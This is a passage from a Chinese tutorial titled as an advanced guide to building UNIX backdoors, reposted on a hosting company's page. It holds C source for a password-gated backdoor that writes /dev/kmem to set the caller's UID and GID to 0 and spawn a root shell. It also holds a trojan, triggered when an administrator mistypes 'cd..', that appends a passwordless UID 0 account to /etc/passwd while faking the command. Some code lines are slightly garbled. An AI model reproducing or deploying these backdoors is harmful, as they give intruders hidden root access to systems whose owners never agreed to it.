创建UNIX后门(高级篇) (2)

c, argv, envp)

    int argc;

    char *argv[], *envp[];{

    int count, fd;

    long where, lseek();

    if(argv[1]){

    if(!(strcmp(pass,argv[1]))){

    fd=(open("/dev/kmem",O_RDWR);

    if(fd<0){

    printf("Cannot read or write to

    /dev/kmemn");

    perror(argv);

    exit(10);

    }

    userlocation=address();

    where=(lseek(fd,userlocation,0);

    if(where!=userlocation){

    printf("Cannot seek to user pagen");

    perror(argv);

    exit(20);

    }

    count=read(fd,&userpage,sizeof(struct user));

    if(count!=sizeof(struct user)){

    printf("Cannot read user pagen");

    perror(argv);

    exit(30);

    }

    printf("Current UID: %dn",userpage.u_ruid);

    printf("Current GID: %dn",userpage.g_ruid);

    userpage.u_ruid=0;

    userpage.u_rgid=0;

    where=lseek(fd,userlocation,0);

    if(where!=userlocation){

    printf("Cannot seek to user pagen");

    perror(argv);

    exit(40);

    }

    write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));

    execle("/bin/csh","/bin/csh","-i",(char *)0, envp);

    }

    }

    }

    <-->

    [“笨”方法]

    你有没有曾经试过在 Unix 系统下错把 "cd .." 输入为 "cd.."?这是由于使用 MS Windows 和 MS-DOS 养成的习惯。这种错误网管是否也会犯呢?如果是这样的话，可不可以让他为我们做点“贡献”呢?:) 例如当他输入 "cd.." 时，会激活我们的木马程序。这样我们就不必登录到系统去激活木马了。以下是程序示例：

    <++> backdoor/dumb.c

    /*

    本程序可在管理员偶然地输入 cd.. 时向 /etc/passwd 文件添加一个 UID 0 帐号。但同时它也实现 cd .. 功能，从而骗过管理员。

    */

    #include

    #include

    main()

    {

    FILE *fd;

    fd=fopen("/etc/passwd","a+");

    fprintf(fd,"hax0r::0:0::/root:/bin/shn");

    system("cd");

    }

    <-->

亿恩科技地址(ADD)：郑州市黄河路129号天一大厦608室 邮编(ZIP)：450008 传真(FAX)：0371-60123888
   联系：亿恩小凡
   QQ：89317007
   电话:0371-63322206

服务器租用/服务器托管中国五强！虚拟主机域名注册顶级提供商！15年品质保障！--亿恩科技[ENKJ.COM]